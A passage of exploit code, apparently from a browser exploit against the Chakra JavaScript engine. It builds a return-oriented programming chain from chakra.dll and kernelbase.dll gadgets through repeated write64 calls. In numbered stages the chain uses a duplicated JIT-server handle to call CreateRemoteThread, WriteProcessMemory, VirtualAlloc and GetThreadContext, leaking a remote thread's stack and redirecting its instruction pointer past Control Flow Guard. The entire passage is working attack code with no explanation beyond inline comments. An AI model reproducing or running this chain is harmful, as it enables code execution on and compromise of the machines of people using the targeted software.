	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

	// HANDLE hProcess (RCX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)

	// LPSECURITY_ATTRIBUTES lpThreadAttributes (RDX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)

	// SIZE_T dwStackSize (R8)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)

	// Call KERNELBASE!CreateRemoteThread
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)

	// WriteProcessMemory() ROP chain (Number 2)
    // Stage 5 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rcx gadget and pop rdi gadget
    // Comments about this occur at the beginning of the VirtualProtect ROP chain we will inject into the JIT process

    // Before, we need to preserve the thread HANDLE returned by CreateRemoteThread
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

    // SIZE_T nSize (R9)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

    // HANDLE hProcess (RCX)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process

    // LPVOID lpBaseAddress (RDX)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is

    // LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored

    // Call KERNELBASE!WriteProcessMemory
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

    // WriteProcessMemory() ROP chain (Number 3)
	// Stage 6 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rdi gadget for our "fake return address"

	// SIZE_T nSize (R9)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

	// HANDLE hProcess (RCX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process

	// LPVOID lpBaseAddress (RDX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetTwo, chakraHigh); // .data section of chakra.dll where our final ROP chain is

	// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored

	// Call KERNELBASE!WriteProcessMemory
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

	// VirtualAlloc() ROP chain
	// Stage 7 -> Allocate some local memory to store the CONTEXT structure from GetThreadContext

	// DWORD flProtect (R9)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // PAGE_READWRITE (0x4)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

	// LPVOID lpAddress (RCX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (let VirtualAlloc() decide the address)

	// SIZE_T dwSize (RDX) (0x4d0 = sizeof(CONTEXT))
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x000004d0, 0x00000000);             // (0x4d0 bytes)

	// DWORD flAllocationType (R8) ( MEM_RESERVE | MEM_COMMIT = 0x3000)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT (0x3000)

	// Call KERNELBASE!VirtualAlloc
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x5ac10, kernelbaseHigh); // KERNELBASE!VirtualAlloc address 
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAlloc)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAlloc - 0x180243949: add rsp, 0x38 ; ret
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        

	// GetThreadContext() ROP chain
    // Stage 8 -> Dump the registers of our newly created thread within the JIT process to leak the stack

    // First, let's store some needed offsets of our VirtualAlloc allocation, as well as the address itself, in the .data section of kernelbase.dll
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108, kernelbaseHigh); // .data section of kernelbase.dll where we will store the VirtualAlloc allocation
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

    // Save VirtualAlloc_allocation+0x30. This is the offset in our buffer (CONTEXT structure) that is ContextFlags
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we will store CONTEXT.ContextFlags
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

    // We need to set CONTEXT.ContextFlags. This address (0x30 offset from CONTEXT buffer allocated from VirtualAlloc) is in kernelbase+0x21a110
    // The value we need to set is 0x10001F
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll with CONTEXT.ContextFlags address
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x0010001F, 0x00000000);             // CONTEXT_ALL
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

    // HANDLE hThread
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where our thread HANDLE is
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (RAX already has valid pointer)

    // LPCONTEXT lpContext
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108-0x8, kernelbaseHigh); // .data section of kernelbase.dll where our VirtualAlloc allocation is (our CONTEXT structure)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret

    // Call KERNELBASE!GetThreadContext
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x72d10, kernelbaseHigh); // KERNELBASE!GetThreadContext address 
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!GetThreadContext)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);       // "return address" for KERNELBASE!GetThreadContext - 0x180243949: add rsp, 0x38 ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        

    // Locate store CONTEXT.Rsp and store it in .data of kernelbase.dll
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we stored CONTEXT.ContextFlags
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x4c37c5, chakraHigh);		// 0x1804c37c5: mov rax, qword [rcx] ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26f73a, chakraHigh);       // 0x18026f73a: add rax, 0x68 ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a118, kernelbaseHigh); // .data section of kernelbase.dll where we want to store CONTEXT.Rsp
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

    // Update CONTEXT.Rip to point to a ret gadget directly instead of relying on CreateRemoteThread start routine (which CFG checks)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26f72a, chakraHigh);      // 0x18026f72a: add rax, 0x60 ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // ret gadget we want to overwrite our remote thread's RIP with 
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xfeab, chakraHigh);        // 0x18000feab: mov qword [rax], rcx ; ret  (Context.Rip = ret_gadget)

    // WriteProcessMemory() ROP chain (Number 4)
    // Stage 9 -> Write our ROP chain to the remote process, using the JIT handle and the leaked stack via GetThreadContext()

    // SIZE_T nSize (R9)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000100, 0x00000000);             // SIZE_T nSize (0x100) (CONTEXT.Rsp is writable and a "full" stack, so 0x100 is more than enough)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

    // LPVOID lpBaseAddress (RDX)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a118-0x08, kernelbaseHigh);      // .data section of kernelbase.dll where CONTEXT.Rsp resides
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret (Pointer to CONTEXT.Rsp)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26ef31, chakraHigh);      // 0x18026ef31: mov rax, qword [rax] ; ret (get CONTEXT.Rsp)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x435f21, chakraHigh);      // 0x180435f21: mov rdx, rax ; mov rax, rdx ; add rsp, 0x28 ; ret (RAX and RDX now both have CONTEXT.Rsp)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

    // LPCVOID lpBuffer (R8)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropBegin, chakraHigh);      // .data section of chakra.dll where our ROP chain is

    // HANDLE hProcess (RCX)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds the full perms handle to JIT server
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
    next();                                                                     // Recall RAX already has a writable pointer in it  

    // Call KERNELBASE!WriteProcessMemory
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
